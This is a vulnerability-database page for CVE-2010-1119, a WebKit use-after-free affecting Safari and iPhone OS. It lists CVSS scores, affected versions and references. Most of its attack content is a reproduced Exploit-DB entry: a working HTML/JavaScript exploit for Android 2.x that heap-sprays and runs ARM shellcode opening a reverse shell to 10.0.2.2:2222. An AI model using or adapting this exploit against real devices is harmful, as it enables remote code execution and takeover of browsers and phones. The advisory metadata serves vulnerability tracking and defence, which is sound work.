CVE-2010-1119 : Detail

87.57%V3
Network
2010-03-25 19h31 +00:00
2017-09-18 10h57 +00:00

CVE Descriptions

Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is thus a way to compare the EPSS score of one CVE with that of the others.

Exploit information

Exploit Database EDB-ID : 16974

Publication date : 2011-03-13 23h00 +00:00
Author : MJ Keith
EDB Verified : Yes

<html>
<!--
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides

email: mkeith AT exploitscience.org
-->
<head>
<script language="JavaScript">
function heap()
{
  var id = document.getElementById("target");
  var attribute = id.getAttributeNode('id');
  nodes = attribute.childNodes;
  document.body.removeChild(id);
  attribute.removeChild(nodes[0]);
  setTimeout(function() {
    for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
    var scode = unescape("\u0060\u0060");
    var scode2 = unescape("\u5005\ue1a0");
    var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\ \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
    shell += unescape("\uae08"); // Port = 2222
    shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
    shell += unescape("\u2000\u2000"); // string terminate
    do
    {
      scode += scode;
      scode2 += scode2;
    } while (scode.length<=0x1000);
    scode2 += shell
    target = new Array();
    for(i = 0; i < 300; i++){
      if (i<130){ target[i] = scode;}
      if (i>130){ target[i] = scode2;}
      document.write(target[i]);
      document.write("<br />");
      if (i>250){
        // alert("freeze");
        nodes[0].textContent}
    }
  }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

Products Mentioned

Configuration 0

Apple>>Safari >> Version To (including) 4.0.5

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0.0

Apple>>Safari >> Version 1.0.0b1

Apple>>Safari >> Version 1.0.0b2

Apple>>Safari >> Version 1.0.1

Apple>>Safari >> Version 1.0.2

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.1

Apple>>Safari >> Version 1.1.0

Apple>>Safari >> Version 1.1.1

Apple>>Safari >> Version 1.2

Apple>>Safari >> Version 1.2.0

Apple>>Safari >> Version 1.2.1

Apple>>Safari >> Version 1.2.2

Apple>>Safari >> Version 1.2.3

Apple>>Safari >> Version 1.2.4

Apple>>Safari >> Version 1.2.5

Apple>>Safari >> Version 1.3

Apple>>Safari >> Version 1.3.0

Apple>>Safari >> Version 1.3.1

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 2

Apple>>Safari >> Version 2.0

Apple>>Safari >> Version 2.0.0

Apple>>Safari >> Version 2.0.1

Apple>>Safari >> Version 2.0.2

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.4

Apple>>Safari >> Version 3

Apple>>Safari >> Version 3.0

Apple>>Safari >> Version 3.0.0

Apple>>Safari >> Version 3.0.0b

Apple>>Safari >> Version 3.0.1

Apple>>Safari >> Version 3.0.1

Apple>>Safari >> Version 3.0.1b

Apple>>Safari >> Version 3.0.2

Apple>>Safari >> Version 3.0.2b

Apple>>Safari >> Version 3.0.3

Apple>>Safari >> Version 3.0.3b

Apple>>Safari >> Version 3.0.4

Apple>>Safari >> Version 3.0.4b

Apple>>Safari >> Version 3.1

Apple>>Safari >> Version 3.1.0

Apple>>Safari >> Version 3.1.0b

Apple>>Safari >> Version 3.1.1

Apple>>Safari >> Version 3.1.2

Apple>>Safari >> Version 3.2.0

Apple>>Safari >> Version 3.2.1

Apple>>Safari >> Version 3.2.2

Apple>>Safari >> Version 3.2.3

Apple>>Safari >> Version 4.0

Apple>>Safari >> Version 4.0

Apple>>Safari >> Version 4.0.0b

Apple>>Safari >> Version 4.0.1

Apple>>Safari >> Version 4.0.2

Apple>>Safari >> Version 4.0.3

Apple>>Safari >> Version 4.0.4

Apple>>Safari >> Version 4.1

Apple>>Mac_os_x >> Version 10.5

Apple>>Mac_os_x >> Version 10.5.0

Apple>>Mac_os_x >> Version 10.5.1

Apple>>Mac_os_x >> Version 10.5.2

Apple>>Mac_os_x >> Version 10.5.3

Apple>>Mac_os_x >> Version 10.5.4

Apple>>Mac_os_x >> Version 10.5.5

Apple>>Mac_os_x >> Version 10.5.6

Apple>>Mac_os_x >> Version 10.5.7

Apple>>Mac_os_x >> Version 10.5.8

Apple>>Mac_os_x >> Version 10.6.0

Apple>>Mac_os_x_server >> Version 10.5.0

Apple>>Mac_os_x_server >> Version 10.5.1

Apple>>Mac_os_x_server >> Version 10.5.2

Apple>>Mac_os_x_server >> Version 10.5.3

Apple>>Mac_os_x_server >> Version 10.5.4

Apple>>Mac_os_x_server >> Version 10.5.5

Apple>>Mac_os_x_server >> Version 10.5.6

Apple>>Mac_os_x_server >> Version 10.5.7

Apple>>Mac_os_x_server >> Version 10.5.8

Apple>>Mac_os_x_server >> Version 10.6.0

Apple>>Mac_os_x_server >> Version 10.6.1

Apple>>Mac_os_x_server >> Version 10.6.2

Apple>>Mac_os_x_server >> Version 10.6.3

Apple>>Mac_os_x_server >> Version 10.6.4

Microsoft>>Windows >> Version *

Configuration 0

Apple>>Iphone_os >> Version 2.0

Apple>>Iphone_os >> Version 2.0.0

Apple>>Iphone_os >> Version 2.0.1

Apple>>Iphone_os >> Version 2.0.2

Apple>>Iphone_os >> Version 2.1

Apple>>Iphone_os >> Version 2.1.1

Apple>>Iphone_os >> Version 2.2

Apple>>Iphone_os >> Version 2.2.1

Apple>>Iphone_os >> Version 3.0

Apple>>Iphone_os >> Version 3.0.1

Apple>>Iphone_os >> Version 3.1

Apple>>Iphone_os >> Version 3.1.2

Apple>>Iphone_os >> Version 3.1.3

References

http://support.apple.com/kb/HT4220
Tags : x_refsource_CONFIRM
http://support.apple.com/kb/HT4225
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/40196
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/40105
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1373
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/1512
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/40620
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/8128
Tags : third-party-advisory, x_refsource_SREASON
http://securitytracker.com/id?1024067
Tags : vdb-entry, x_refsource_SECTRACK
http://support.apple.com/kb/HT4196
Tags : x_refsource_CONFIRM